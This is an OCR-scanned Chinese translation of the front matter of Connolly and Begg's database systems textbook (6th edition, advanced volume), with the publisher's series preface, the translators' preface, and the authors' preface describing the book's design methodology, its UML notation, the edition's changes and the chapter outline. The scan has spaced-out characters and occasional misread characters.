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文艺 复兴 以 来 ， 源 远 流 长 的 科学 精神 和 逐步 形成 的 学 术 规范 ， 使 西方 国家 在 自然 科学 的 各 
个 领域 取得 了 芍 断 性 的 优势 也 正 是 这 样 的 优势 ， 使 美国 在 信息 技术 发 展 的 六 十 多 年 间 名 家 辈 
出 、 独 领 风骚 。 在 商业 化 的 进程 中 ， 美 国 的 产业 界 与 教育 界 越 来 越 紧 密 地 结合 ， 计 算 机 学 科 中 
的 许多 泰山 北斗 同时 身 处 科研 和 教学 的 最 前 线 ， 由 此 而 产生 的 经 典 科 学 著作 ， 不 仅 辟 划 了 研究 
的 范畴 ， 还 揭示 了 学 术 的 源 变 ， 既 遵循 学 术 规范 ， 又 自 有 学 者 个 性 ， 其 价值 并 不 会 因 年 月 的 流 
逝 而 减退 。 

近年 ， 在 全 球 信息 化 大 潮 的 推动 下 ,我 国 的 计算 机 产业 发 展 迅 猛 ， 对 专业 人 才 的 需求 日 益 
迫切 。 这 对 计算 机 教育 界 和 出 版 界 都 既是 机 遇 ， 也 是 挑战 ; 而 专业 教材 的 建设 在 教育 战略 上 显 
得 举足轻重 。 在 我 国信 息 技术 发 展 时 间 较 短 的 现状 下 ， 美 国 等 发 达 国 家 在 其 计算 机 科学 发 展 的 
几 十 年 间 积 淀 和 发 展 的 经 典 教 材 仍 有 许多 值得 借鉴 之 处 。 因 此 ， 引 进 一 批 国外 优秀 计算 机 教材 
将 对 我 国 计 算 机 教育 事业 的 发 展 起 到 积极 的 推动 作用 ， 也 是 与 世界 接轨 、 建 设 真正 的 世界 一 流 
大 学 的 必由之路 。 

机 械 工 业 出 版 社 华章 公司 较 早 意识 到 “出 版 要 为 教育 服务 。 自 1998 年 开始 ， 我 们 
就 将 工作 重点 放 在 了 六 选 、 移 译 国 外 优秀 教材 上 。 经 过 多 年 的 不 懈 努 力 ， 我 们 与 Pearson， 
McGraw-Hill，Elsevier，MIT，John Wiley & Sons，Cengage 等 世界 著名 出 版 公司 建立 了 良好 的 
合作 关系 ,从 他 们 现 有 的 数 百 种 教材 中 甄选 出 Andrew S. Tanenbaum，Bjarne Stroustrup，Brian 
W. Kernighan, Dennis Ritchie, Jim Gray, Afred V. Aho, John E. Hopcroft，Jeffrey D. Ullman， 
Abraham Silberschatz, William Stallings, Donald E. Knuth, John L. Hennessy, Larry L. Peterson 
等 大 师 名 家 的 一 批 经 典 作品 ， 以 “计算 机 科学 丛书 ”为 总 称 出 版 ， 供 读者 学 习 、 研 究 及 珍藏 。 
大 理 石 纹理 的 封面 ， 也 正体 现 了 这 套 从 书 的 品位 和 格调 。 

“计算 机 科学 丛书 ”的 出 版 工作 得 到 了 国内 外 学 者 的 易 力 相助 ， 国 内 的 专家 不 仅 提供 了 中 
肯 的 选 题 指导 ， 还 不 辞 劳苦 地 担任 了 翻译 和 审 校 的 工作 ; 而 原 书 的 作者 也 相当 关注 其 作品 在 中 
国 的 传播 ， 有 的 还 专门 为 其 书 的 中 译本 作 序 。 迄 今 ,“ 计 算 机 科学 丛书 ”已 经 出 版 了 近 两 百 个 
品种 ， 这 些 书籍 在 读者 中 树立 了 良好 的 口碑 ， 并 被 许多 高 校 采 用 为 正式 教材 和 参考 书籍 。 其 影 
印 版 “经 典 原 版 书库 ”作为 姊妹 篇 也 被 越 来 越 多 实施 双语 教学 的 学 校 所 采用 。 

权威 的 作者 、 经 典 的 教材 、 一 流 的 译 者 、 严 格 的 审 校 、 精 细 的 编辑 ， 这 些 因素 使 我 们 的 图 
书 有 了 质量 的 保证 。 随 着 计算 机 科学 与 技术 专业 学 科 建 设 的 不 断 完善 和 教材 改革 的 逐渐 深化 ， 
教育 界 对 国外 计算 机 教材 的 需求 和 应 用 都 将 步 人 一 个 新 的 阶段 ,我 们 的 目标 是 尽善尽美 ， 而 反 
馈 的 意见 正 是 我 们 达到 这 一 终极 目标 的 重要 帮助 。 华 章 公司 欢迎 老师 和 读者 对 我 们 的 工作 提出 
建议 或 给 予 指正 ， 我 们 的 联系 方法 如 下 : 


华章 网 站 ，www.hzbook.com 
电子 邮件 : hzjsi@hzbook.com 
联系 电话 ,( 010 ) 88379604 
联系 地 址 : 北京 市 西城 区 百 万 庄 南 街 1 号 
邮政 编码 : 100037 华章 科技 图 书 出 版 中 心 
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随 着 信息 社会 的 到 来 ， 数 据 日 益 成 为 宝贵 的 资源 ， 数 据 库 作为 数据 管理 的 基本 技术 和 
工具 正 广泛 应 用 于 各 行 各 业 。 然 而 ， 正 如 本 书 作者 在 前 言 中 所 述 :“ 遗 憾 的 是 ， 正 是 由 于 数 
据 库 系统 的 简单 性 ， 许 多 用 户 有 可 能 尚 缺 乏 必要 的 知识 ， 还 不 懂得 如 何 开发 正确 且 高 效 的 系 
统 ， 就 开始 创建 数据 库 及 其 应 用 程序 了 。” 本 书 的 目标 就 是 以 读者 易于 接受 和 理解 的 方式 介 
绍 数 据 库 设计 、 实 现 和 管理 的 基本 理论 、 方 法 与 技术 。 本 书 既 涵盖 了 数据 库 领域 的 经 典 内 
容 ， 又 反映 了 近期 的 研究 成 果 ， 特 别 是 为 数据 库 概 念 设计 、 人 逻辑 设 计 和 物理 设计 提供 了 步 又 
完备 的 方法 学 ,非常 有 实用 价值 。2004 年 我 们 曾 翻译 出 版 了 本 书 的 第 3 版 ， 广 受 读者 欢迎 ， 
后 来 的 第 4、5 版 扩充 了 数据 库 领 域 的 新 技术 ,特别 是 随 着 互联 网 、 移 动 计算 的 发 展 衍生 出 
来 的 许多 应 用 技术 ， 同 时 增强 了 可 读 性 。 第 6 版 增加 了 云 计算 、 时 态 数 据 库 等 内 容 ， 充 实 了 
第 21 章 “数据 管理 中 的 职业 、 法 律 与 道德 问题 "， 与 SQL 相关 的 章节 全 面 更 新 为 2011 年 公 
布 的 新 标准 SQL: 2011。 

本 书 的 两 位 作者 均 具 有 丰富 的 数据 库 管理 系统 和 数据 库 应 用 系统 的 设计 经 验 ， 托 马 
斯 M. 康 诺 利 (Thomas M. Connolly) 曾 参 与 设计 世界 上 第 一 个 商业 可 移动 数据 库 管 理 系 统 
RAPPORT 和 配置 管理 工具 LIFESPAN， 后 者 获 英国 设计 奖 ; 卡 洛 琳 E. 贝 格 (Carolyn E. 
Begg) 则 是 数据 库 技术 应 用 于 生物 领域 的 专家 。 

本 书 系统 性 强 、 结 构 清晰 ， 特 别 注 重 理论 联系 实际 ， 并 以 一 个 可 运行 的 DreamHome( 房 
屋 租赁 公司 ) 案例 贯穿 全 书 ， 便 于 阅读 和 理解 。 本 书 既 可 作为 计算 机 及 相关 专业 本 科 生 数据 
库 管 理 或 数据 库 设 计 的 导论 性 教材 (选取 部 分 内 容 )， 也 可 作为 研究 生 或 高 年 级 本 科 生 相关 
课程 的 教材 ， 亦 可 作为 IT 专业 人 士 (包括 系统 分 析 和 设计 人 员 、 应 用 程序 开发 人 员 、 系 统 
程序 员 、 数 据 库 从 业 人 员 及 独立 的 自学 者 ) 的 参考 书 。 

中 文 版 分 为 两 册 ， 共 九 个 部 分 。 本 书 为 进 阶 篇 ， 包 括 原 书 的 第 六 一 九 部 分 ， 主 要 讨论 
数据 库 的 一 些 新 技术 。 其 中 第 六 部 分 阐述 当前 数据 库 系统 领域 主要 发 展 方向 之 一 的 分 布 式 
DBMS ; 第 七 部 分 讨论 试图 克服 关系 数据 库 系 统 种 种 缺陷 的 面向 对 象 DBMS ; 第 八 部 分 涉 
及 将 DBMS 集成 到 Web 环境 的 问题 、 半 结构 化 数据 及 其 与 XML 的 关系 、XML 查询 语言 
以 及 XML 到 数据 库 的 映射 等 内 容 ; 第 九 部 分 讨论 商务 智能 ， 包 括 数据 仓库 、 联 机 分 析 处 理 
(OLAP) 和 数据 挖掘 。 

宁 洪 教授 全 面 负 责 本 书 的 翻译 ， 李 姗 姗 提供 了 第 八 、 九 部 分 的 部 分 初稿 ， 王 静 提 供 了 第 
六 、 七 部 分 的 部 分 初稿 ， 全 书 由 宁 洪 教授 统 稿 并 审 校 。 

限于 译 者 水 平 ， 译 文中 的 玲 漏 和 错误 在 所 难免 ， 欢 迎 批 评 指正 。 

本 书 是 在 2004 年 翻译 的 第 3 版 的 基础 上 完成 的 ， 借 此 机 会 向 参与 第 3 版 翻译 工作 的 其 
他 译 者 致谢 。 


译 者 
国防 科技 大 学 计算 机 科学 与 技术 系 
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背景 


在 过 去 的 30 年 中 ， 数 据 库 的 研究 带 来 了 巨大 的 生产 力 ， 使 得 数据 库 系 统 成 为 软件 工程 
领域 最 重要 的 成 果 。 目 前 ， 数 据 库 作为 信息 系统 的 基本 框架 ， 已 从 根本 上 改变 了 许多 公司 的 
运作 方式 。 特 别 是 在 最 近 几 年 里 ， 随 着 这 项 技术 本 身 的 发 展 ， 产 生 了 一 些 功 能 更 强大 、 使 
用 更 方便 的 系统 。 这 使 得 数据 库 系 统 变 得 越 来 越 普 及 ， 用 户 类 型 也 越 来 越 广 泛 。 遗 憾 的 是 ， 
正 是 由 于 数据 库 系 统 的 简单 性 ， 许 多 用 户 有 可 能 尚 缺乏 必要 的 知识 ， 还 不 懂得 如 何 开发 正 
确 且 高 效 的 系统 ， 就 开始 创建 数据 库 及 其 应 用 程序 了 。 这 样 很 可 能 导致 所 谓 的 “软件 危机 ” 
(software crisis， 有 时 也 称 为 “软件 抑郁 ”(software depression) ) 的 延续 。 

编写 本 书 的 最 初 动因 是 我 们 在 工业 界 的 工作 经 历 ， 当 时 我 们 为 新 软件 系统 中 数据 库 的 
设计 提供 咨询 ， 间 或 也 解决 遗留 系统 中 存在 的 种 种 问题 。 进 入 学 术 界 后 ， 我 们 从 另 一 类 用 
户 一 一 学 生 那 里 发 现 了 类 似 的 问题 。 因 此 ， 本 书 的 目标 就 是 给 出 一 本 教程 ， 尽 可 能 清楚 地 介 
绍 数 据 库 的 基础 理论 ， 并 给 出 一 套 既 能 为 专业 技术 人 员 亦 能 为 非 技 术 人 员 所 用 的 数据 库 设 计 
方法 学 。 

本 书 针对 当前 主流 的 商用 产品 一 一 关系 数据 库 管 理 系 统 ( DBMS) 给 出 的 设计 方法 学 ， 
已 在 学 术 界 和 工业 界 测试 和 使 用 了 许多 年 。 它 包括 三 个 主要 阶段 : 数据 库 的 概念 设计 、 逻 
辑 设 计 和 物理 设计 。 第 一 个 阶段 在 不 考虑 任何 物理 因素 的 前 提 下 设计 概念 数据 模型 ， 得 到 
的 数据 模型 在 第 二 阶段 被 细 化 为 逻辑 数据 模型 ， 细 化 过 程 主要 是 去 除 在 关系 系统 中 无 法 表 
示 的 结构 。 在 第 三 阶段 ， 逻 辑 数据 模型 被 转换 成 针对 目标 DBMS 的 物理 设计 ， 物 理 设计 
阶段 主要 考虑 如 何 设计 存储 结构 和 访问 方法 ， 以 便 有 效 并 安全 地 访问 存储 在 辅 存 中 的 数 
据 库 。 

该 方法 学 按 阶段 被 分 为 一 系列 步骤 。 对 于 缺少 经 验 的 设计 者 ， 最 好 按 步骤 进行 设计 ， 这 
里 所 提供 的 指南 可 帮助 你 完成 整个 过 程 。 对 于 有 经 验 的 设计 者 ， 该 方法 学 的 指导 作用 显然 会 
弱化 ， 但 经 常 可 用 于 开发 框架 和 检查 列表 。 为 了 帮助 读者 学 习 使 用 上 述 方法 学 并 理解 其 要 
点 ， 整 个 方法 学 的 描述 中 始终 贯穿 一 个 完整 的 DreamHome 案例 研究 。 附 录 B 还 给 出 了 另外 
三 个 案例 ， 供 读者 自行 研究 。 


UML (统一 建 模 语言 ) 


越 来 越 多 的 公司 都 在 规范 各 自 的 数据 建 模 方法 ， 即 选择 一 种 特定 的 建 模 方法 并 在 整个 数 
据 库 开 发 项 目 中 始终 如 一 地 使 用 它 。 一 种 在 数据 库 概念 设计 和 逻辑 设计 阶段 较为 通用 的 高 级 
数据 模型 是 ER (实体 - 联系 ) 模型 ， 这 也 是 本 书 采用 的 模型 。 由 于 当前 还 没有 表示 ER 模型 
的 标准 方法 ， 因 此 大 部 分 书籍 在 描述 关系 DBMS 的 数据 库 设 计时 ， 常 常 使 用 下 述 两 种 表示 
方法 之 一 : 

e Chen 氏 表示 方法 ， 即 用 矩形 表示 实体 ， 用 菱形 表示 联系 ， 用 线段 连接 矩形 和 菱形 。 

。 Crow Feet ( 鸦 爪 ) 表示 方法 ， 仍 用 抑 形 表示 实体 ， 用 实体 间 的 连 线 表示 联系 ， 在 一 对 

多 联系 连 线 的 多 端 有 一 个 鸦 爪 标记 。 





VI 


当前 ， 这 两 种 表示 方法 都 有 计算 机 辅助 软件 工程 (CASE) 工具 。 然 而 ， 它 们 都 难于 使 
用 和 和 解释。 本 书 的 较 早 版 本 曾 使 用 Chen 氏 表 示 方 法 ， 而 在 随后 培 生 教育 出 版 集团 进行 的 一 
次 问卷 调查 中 ， 比 较 一 致 的 意见 是 应 该 使 用 最 新 的 称 为 UML ( Unified Modeling Language， 
统一 建 模 语言 ) 的 面向 对 象 建 模 语 言 。UML 表示 方法 结合 了 面向 对 象 设计 三 大 流派 的 成 分 : 
Rumbaugh 的 OMT 建 模 语言 ，Booch 的 面向 对 象 分 析 和 面向 对 象 设计 ， 以 及 Jacobson 的 
Objectory。 

换 用 表示 方法 主要 有 以 下 三 个 原因 : (1) UML 正成 为 一 种 工业 标准 ， 例 如 ， 对 象 管理 
组 (OMG) 已 经 采纳 UML 作为 对 象 方法 的 标准 表示 方法 ; (2 ) UML 表达 清楚 并 易于 使 用 ; 
(3 ) UML 目前 已 被 学 术 界 用 于 面向 对 象 分 析 与 设计 的 教学 ， 在 数据 库 模 块 的 教学 中 也 使 用 
UML 将 会 更 加 一 致 。 因 此 ， 在 这 个 版 本 中 ,我 们 将 采用 UML 的 类 图 作为 ER 模型 的 表示 方 
法 。 读 者 将 会 发 现 这 种 表示 方法 更 加 容易 理解 和 使 用 。 


第 6 版 的 更 新 之 处 


e 扩展 了 第 3 章 “ 数 据 库 的 结构 与 Web”， 增 加 了 云 计 算 。 

e 修改 了 第 21 章 “数据 管理 中 的 职业 、 法 律 与 道德 问题 ”。 

。 增加 了 “数据 仓库 与 时 态 数 据 库 ”( 31.5 节 )。 

。 每 章 后 增加 了 新 的 思考 题 和 习题 。 

e 修改 了 与 SQL 相关 的 章节 ， 全 面 反映 2011 年 公布 的 新 标准 SQL:2011。 
。 修订 了 第 26 章 “复制 与 移动 数据 库 ”。 

e 修改 了 关于 Web-DBMS 集成 和 XML 的 章节 。 

e 与 Oracle 相关 的 内 容 一 律 修改 为 针对 Oracle 11g。 


读者 对 象 


本 书 可 作为 本 科 生 数据 库 管 理 或 数据 库 设计 的 导论 性 教材 ， 也 可 作为 研究 生 或 高 年 级 本 
科 生 相关 课程 的 教材 ， 学 时 可 分 为 一 到 两 个 学 期 。 通 常 信息 系统 、 商 业 IT 或 计算 机 科学 等 
专业 都 包含 这 类 课程 。 

本 书 还 可 以 作为 一 些 IT 专业 人 士 的 参考 书 ， 如 系统 分 析 和 设计 人 员 、 应 用 程序 开发 人 
员 、 系 统 程序 员 、 数 据 库 从 业 人 员 及 独立 的 自学 者 。 随 着 当今 数据 库 系统 的 广泛 使 用 ， 这 些 
专业 人 士 可 能 来 自 于 需要 数据 库 的 任何 类 型 的 公司 。 

读者 在 学 习 关 于 物理 数据 库 设 计 的 第 18 章 和 关于 查询 处 理 的 第 23 章 之 前 ， 如 果 对 附录 
F 中 介绍 的 文件 组 织 和 数据 结构 相关 概念 有 清楚 的 了 解 ， 那 么 将 会 有 所 帮助 。 理 想 的 情况 是 
这 些 背 景 知识 已 从 前 导 课 程 中 获得 。 如 果 不 具 备 这 个 条 件 ， 则 可 以 在 开始 数据 库 课 程 后 ， 学 
完 第 1 章 立即 学 习 附 录 FF。 

如 果 读 者 已 经 掌握 了 一 门 高 级 编程 语言 ， 比 如 C， 那 么 在 学 习 附 录 工 的 嵌入 式 与 动态 
SQL 和 28.3 节 的 ObjectStore 时 会 更 有 成 效 。 


突出 特点 


(1 ) 为 数据 库 逻 辑 设计 和 概念 设计 提供 了 易 用 、 逐 步 指导 的 方法 学 ， 该 方法 学 基于 广泛 
采用 的 实体 = 联系 模型 并 将 规范 化 作为 验证 技术 。 此 外 ， 通 过 一 个 完整 的 案例 研究 来 说 明 如 
何 使 用 这 套 方法 学 。 

(2 ) 为 数据 库 物 理 设计 提供 了 易 用 、 逐 步 指导 的 方法 学 ， 包括: 逻辑 设计 到 物理 实现 的 


VI 


上 映射， 文件 组 织 方法 的 选择 ， 适 合 应 用 程序 的 索引 结构 ， 以 及 何 时 引入 可 控 完 余 。 此 外 , 通 
过 一 个 完整 的 案例 研究 来 说 明 如 何 使 用 这 套 方法 学 。 

(3 ) 用 独立 的 章节 来 讲解 以 下 三 个 主题 : 数据 库 设 计 阶 段 在 整个 系统 开发 生命 周期 中 的 
位 置 与 作用 ; 如 何 使 用 实况 发 现 技术 来 获取 系统 需求 ; 如 何 将 UML 用 于 整个 方法 学 。 

(4) 每 章 都 采用 清晰 且 易 于 理解 的 表述 方法 ， 如 突出 显示 定义 ， 明 确 给 出 各 章 学 习 
目标 ， 在 各 章 最 后 进行 小 结 。 通 篇 使 用 了 大 量 示 例 和 图 表 来 说 明 概念 。 来 自 现实 生活 的 
DreamHome 案例 研究 贯穿 全 书 ， 另 外 还 给 出 若干 案例 供 学 生 选 作 课 程 实践 题目 。 

(5) 扩充 了 下 列 最 新 的 正式 标准 及 事实 标准 : 结构 化 查询 语言 (SQL)， 举 例 查询 
(QBE)， 面 向 对 象 数据 库 的 对 象 数据 管理 组 (ODMG ) 标准 。 

(6 ) 利用 三 章 的 篇 幅 ， 以 教程 式 风格 介绍 SQL 标准 ， 包 含 交互 式 和 髋 入 式 SQL。 

(7) 专 设 一 章 讨 论 IT 和 数据 库 中 的 职业 、 法 律 与 道德 问题 。 

(8 ) 全 面 讨 论 了 与 分 布 式 DBMS 和 复制 服务 器 相关 的 概念 和 问题 。 

(9 ) 全 面 介绍 了 基于 对 象 的 DBMS 中 的 一 些 概念 和 问题 。 回 顾 了 ODMG 标准 ， 介 绍 了 
在 最 新 公布 的 SQL 版 本 SQL:2011 中 出 现 的 各 种 对 象 管理 机 制 。 

(10 ) 扩展 了 作为 数据 库 应 用 平台 的 Web 部 分 的 内 容 ， 并 给 出 多 个 Web 数据 库 访问 的 
代码 示例 。 具 体 包括 容器 管理 持久 性 (CMP)、Java 数据 对 象 (JDO)、Java 持久 性 API (JPA)、 
JDBC、SQLJ、ActiveX 数据 对 象 (ADO)、ADO.NET 和 Oracle PL/SQL Pages (PSP)。 

( 11 ) 介绍 了 半 结 构 化 数据 及 其 与 XML 的 关系 ,扩展 了 XML 的 内 容 和 相关 术语 ， 包 括 
XML Schema、XQuery、XQuery 数据 模型 和 形式 语义 。 还 讨论 了 在 数据 库 中 集成 XML， 以 
及 为 发 布 XML 而 在 SQL:2008 和 SQL:2011 中 所 做 的 扩展 。 

(12 ) 全 面 介绍 了 数据 仓库 、 联 机 分 析 处 理 (OLAP) 和 数据 控 掘 。 

(13 ) 全 面 介绍 了 用 于 数据 仓库 数据 库 设计 的 维度 建 模 技术 ， 并 且 通 过 一 个 完整 的 案例 
来 演示 如 何 使 用 该 方法 进行 数据 仓库 数据 库 设 计 。 

(14) 介绍 了 DBMS 系统 实现 的 有 关 概 念 ， 包 括 并 发 技术 和 恢复 控制 、 安 全 以 及 查询 处 
理 和 查询 优化 。 


教学 方法 


在 开始 撰写 本 书 之 前 ,我 们 的 目标 之 一 就 是 写 一 本 让 读者 容易 接受 和 理解 的 教材 ， 而 不 
管 读 者 具备 怎样 的 背景 知识 和 经 验 。 根 据 我 们 使 用 教材 的 经 验 以 及 从 很 多 同事 、 客 户 和 学 生 
中 吸收 的 意见 ， 实 际 上 存在 若干 读者 喜爱 和 不 喜爱 的 设计 特性 。 考 虑 到 这 些 因 素 ， 本 书 决定 
采用 如 下 的 风格 和 结构 : 
。 在 每 章 的 开头 明确 说 明 该 章 的 学 习 目 标 。 
。 清楚 定义 每 一 个 重要 的 概念 ， 并 用 特殊 格式 突出 显示 。 
。 通 篇 大 量 使 用 图 表 来 支持 和 阅 明 概念 。 
面向 实际 应 用 : 为 了 做 到 这 点 ， 每 章 都 包含 了 许多 实际 有 效 的 示例 以 说 明 所 描述 的 
概念 。 
。 每 章 最 后 配 有 小 结 ， 涉 及 该 章 所 有 主要 的 概念 。 
。 每 章 最 后 配 有 思考 题 ， 问 题 的 答案 都 可 以 在 书 中 找到 。 
。 每 章 最 后 配 有 习题 ， 教 师 可 用 其 测试 学 生 对 章节 内 容 的 理解 ， 自 学 者 也 可 进行 自 测 。 
全 部 习题 的 答案 可 以 在 原 书 配套 的 教 辅 资源 “教师 答案 手册 ”中 找到 。 
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教 辅 资源 9 

适用 于 本 教材 的 教 辅 资源 包括 : 

e 课程 PPT。 

。 教师 答案 手册 ， 包 括 所 有 课 后 思考 题 和 习题 的 答案 示例 。 

e 其 他 资源 的 配套 网 站 : www.pearsonhighered.com/connolly-begg。 

上 述 资源 仅 提 供给 在 www.pearsonhighered.comyirc 上 注册 过 的 教师 。 请 与 当地 的 销售 代 
表 联 系 。 


本 书 结构 


第 一 部 分 ”背景 


本 书 的 第 一 部 分 介绍 数据 库 系统 和 数据 库 设 计 。 

第 1 章 引 入 数据 库 管 理 的 概念 。 主 要 阐述 了 数据 库 前 身 ， 即 基于 文件 的 系统 之 不 足 及 数 
据 库 方法 所 具备 的 优势 。 

第 2 章 总 览 数 据 库 环境 。 主 要 讨论 了 三 层 ANSI-SPARC 体系 结构 的 优点 ， 介 绍 了 目前 
最 通用 的 数据 模型 ， 列 出 了 多 用 户 DBMS 应 提供 的 各 种 功能 。 

第 3 章 考 察 各 种 多 用 户 DBMS 结构 ， 讨 论 了 数据 库 领 域 不 同类 型 的 中 间 件 。 分 析 Web 
服务 ， 它 能 为 用 户 和 SOA (面向 服务 的 结构 ) 提供 新 型 的 业务 服务 。 该 章 简要 描述 分 布 式 
DBMS 和 数据 仓库 的 结构 ， 后 面 还 将 详细 讨论 。 该 章 还 给 出 一 个 抽象 DBMS 的 内 部 结构 以 
及 Oracle DBMS 的 逻辑 结构 和 物理 结构 ， 这 一 部 分 内 容 在 数据 库 管 理 初级 课程 中 可 以 略 去 。 


第 二 部 分 “关系 模型 与 语言 


本 书 的 第 二 部 分 介绍 关系 模型 和 关系 语言 ， 即 关系 代数 和 关系 演算 、QBE (举例 查询 ) 
和 SQL (结构 化 查询 语言 )。 这 部 分 还 介绍 了 两 种 非常 流行 的 商用 系统 : Microsoft Access 和 
Oracle。 

第 4 章 介 绍 当 前 最 流行 的 数据 模型 一 一 关系 模型 背后 的 概念 ， 这 是 最 常 被 选 作 商 用 标准 
的 模型 。 具 体 安排 是 首先 介绍 术语 并 说 明 其 与 数学 上 的 关系 的 联系 ， 然 后 讨论 关系 完整 性 规 
则 ， 包括 实体 完整 性 和 引用 完整 性 。 这 一 章 最 后 概述 视图 ， 第 7 章 还 将 进一步 讨论 视图 。 

第 5 章 介绍 关系 代数 和 关系 演算 ， 并 用 示例 加 以 说 明 。 这 部 分 内 容 在 数据 库 管 理 初级 课 
程 中 可 以 略 去 。 然 而 ， 在 第 23 章 学 习 查询 处 理 和 第 24 章 学 习 分 布 式 DBMS 的 分 段 时 需要 
用 到 关系 代数 的 知识 。 此 外 ， 虽 然 不 是 绝对 有 必要 ， 但 是 了 解 过 程式 的 代数 与 非 过 程式 的 演 
算 之 间 的 区 别 将 有 利于 学 习 第 6 章 和 第 7 章 介 绍 的 SQL 语言 。 

第 6 章 介 绍 SQL 的 数据 操作 语句 SELECT、INSERT、UPDATE 和 DELETE。 该 章 通过 
一 系列 有 效 的 示例 ， 以 教程 式 的 风格 说 明了 这 些 语句 的 主要 概念 。 

第 7 章 讨论 SQL 标准 中 主要 的 数据 定义 机 制 。 该 章 仍 采用 教程 式 风格 ， 介 绍 SQL 的 数 
据 类 型 、 数 据 定义 语句 、 完 整 性 增强 特性 (IEF) 和 数据 定义 语句 中 一 些 更 高 级 的 特性 ， 包 


日 关于 本 书 教 辅 资源 ， 只 有 使 用 本 书 作为 教材 的 教师 才 可 以 申请 ， 需 要 的 教师 请 联系 机 械 工业 出 版 社 华章 公 
司 ， 电 话 : 13601156823， 邮 箱 :，wangguang@hzbook.com。 一 一 编辑 注 

日 ”中 文 版 分 为 两 册 ， 分 别 对 应 原 书 第 一 ~ 五 部 分 (基础 篇 ) 和 第 六 一 九 部 分 ( 进 阶 篇 )。 本 书 为 进 阶 篇 。 一 一 
编辑 注 





括 访 问 控制 语句 GRANT 和 REVOKE。 此 外 ， 将 再 次 讨论 视图 以 及 用 SQL 如 何 创建 视图 。 
第 8 章 涉及 SQL 的 一 些 高 级 特性 ， 包 括 SQL 的 编程 语言 (SQL/PSM)、 和 触发 器 和 存储 
第 9 章 介绍 对 象 关 系 DBMS ， 并 详细 描述 了 SQL 新 标准 SQL:2011 中 的 各 种 对 象 管理 
特性 。 该 章 还 讨论 了 如 何 扩展 查询 处 理 和 查询 优化 机 制 ， 以 高 效 处 理 扩展 的 各 种 数据 类 型 。 
该 章 最 后 将 讨论 Oracle 中 的 对 象 关系 特性 。 


第 三 部 分 “数据库 分 析 与 设计 


本 书 的 第 三 部 分 讨论 数据 库 分 析 和 设计 的 主要 技术 ， 以 及 这 些 技术 的 实际 运用 方法 。 

第 10 章 总 览 数据 库 系统 开发 生命 周期 的 各 个 主要 阶段 。 特 别 强调 了 数据 库 设 计 的 重要 
性 ， 并 说 明 这 个 过 程 如 何 被 分 为 概念 、 逻 辑 和 物理 数据 库 设 计 三 个 阶段 。 此 外 ， 还 描述 了 应 用 
程序 的 设计 (功能 方面 ) 对 数据 库 设 计 (数据 方面 ) 的 影响 。 数 据 库 系统 开发 生命 周期 的 关键 
阶段 是 选择 合适 的 DBMS。 这 一 章 讨论 了 对 DBMS 的 选择 过 程 ， 提 供 了 一 系列 方针 和 建议 。 

第 11 章 讨论 数据 库 开 发 者 应 于 何 时 使 用 实况 发 现 技术 ， 以 及 捕获 何 种 类 型 的 实况 。 这 
一 章 描述 了 最 常用 的 实况 发 现 技 术 及 其 优 缺 点 。 通 过 DreamHome 案例 研究 说 明 在 数据 库 系 
统 生命 周期 的 早期 阶段 如 何 应 用 这 些 技术 。 

第 12 章 和 第 13 章 介 绍 了 实体 - 联系 模型 和 扩展 的 实体 -联系 (EER) 模型 ， 在 EER 
模型 中 ， 人 允许 使 用 更 高 级 的 数据 建 模 技术 ， 如 子 类 、 超 类 和 分 类 。EER 模型 是 一 种 流行 的 高 
级 概念 数据 模型 ， 也 是 这 里 讨论 的 数据 库 设计 方法 学 的 一 种 基本 技术 。 这 两 章 还 为 读者 介绍 
了 如 何 使 用 UML 来 表示 ER 图 。 

第 14 章 和 第 15 章 阐述 了 规范 化 背后 的 一 系列 概念 ， 它 是 逻辑 数据 库 设 计 方法 学 中 的 
另 一 项 重要 技术 。 通 过 从 一 个 完整 的 案例 中 抽取 的 几 个 有 效 部 分 ， 说 明 如何 从 一 种 范式 转换 
到 另 一 种 范式 ， 以 及 将 数据 库 逻 辑 设计 转换 为 某 一 更 高 范式 (直至 第 五 范式 ) 的 好 处 。 


第 四 部 分 方法 学 


本 书 的 第 四 部 分 介绍 了 一 种 数据 库 设 计 方 法 学 。 该 方法 学 分 为 三 个 阶段 ， 分 别 是 概念 数 
据 库 设计 、 逮 辑 数据 库 设 计 和 物理 数据 库 设计 。 每 个 部 分 都 使 用 DreamHome 案例 研究 加 以 
阐述 。 

第 16 章 为 概念 数据 库 设计 提供 逐步 指导 的 方法 学 。 该 章 说 明了 如 何 将 设计 分 解 成 多 个 
基于 各 自视 图 的 易于 管理 的 部 分 ， 还 给 出 了 标识 实体 、 属 性 、 联 系 和 关键 字 的 方法 。 

第 17 章 为 关系 模型 的 逻辑 数据 库 设计 提供 逐步 指导 的 方法 学 。 该 章 阑 述 了 如 何 将 概念 
数据 模型 映射 到 逻辑 数据 模型 ， 以 及 如 何 针对 所 需 的 事务 使 用 规范 化 技术 来 验证 逻辑 数据 模 
型 。 对 于 有 多 个 用 户 视图 的 数据 库 系统 ， 这 一 章 还 介绍 了 如 何 将 得 到 的 多 个 数据 模型 合并 为 
一 个 能 表示 所 有 视图 的 全 局 数据 模型 。 

第 18 章 和 第 19 章 为 关系 系统 的 物理 数据 库 设 计 提 供 逐 步 指导 的 方法 学 。 该 章 曾 述 了 如 
何 将 逻辑 数据 库 设计 阶段 开发 的 全 局 数据 模型 转换 成 某 关 系 系统 的 物理 设计 。 方 法 学 中 还 说 
明了 如 何 通 过 选择 文件 组 织 方式 和 存储 结构 ， 以 及 何 时 引入 可 控 宛 余 来 改善 实现 的 性 能 。 


第 五 部 分 “可 选 的 数据 库 专题 


第 五 部 分 阐述 了 我 们 认为 对 于 现代 数据 库 管 理 课程 必要 的 四 个 专题 。 
第 20 章 讨 论 数据 库 的 安全 和 管理 问题 。 安 全 不 仅 要 考虑 DBMS ， 还 包括 整个 环境 。 该 


章 将 讨论 Microsoft Office Access 和 Oracle 提供 的 一 些 安 全 保障 ， 并 专门 阐述 了 在 Web 环 
境 下 的 一 些 安全 问题 ， 并 给 出 了 解决 这 些 问题 的 方法 。 最 后 讨论 数据 管理 和 数据 库 管理 的 
任务 。 

第 21 章 考虑 有 关 IT 和 数据 管理 与 治理 的 职业 、 法 律 与 道德 问题 。 主 要 内 容 包括 区 分 数 
据 和 数据 库 管理 员 面 对 的 问题 和 场景 中 哪些 属 法 律 范畴 、 哪 些 属 道德 范畴 ; 各 项 新 的 规章 给 
数据 和 数据 库 管 理 员 提 出 了 哪些 新 的 要 求 和 职责 ; 萨 班 斯 - 奥克斯 利 法 案 和 巴塞 尔 工 协议 等 
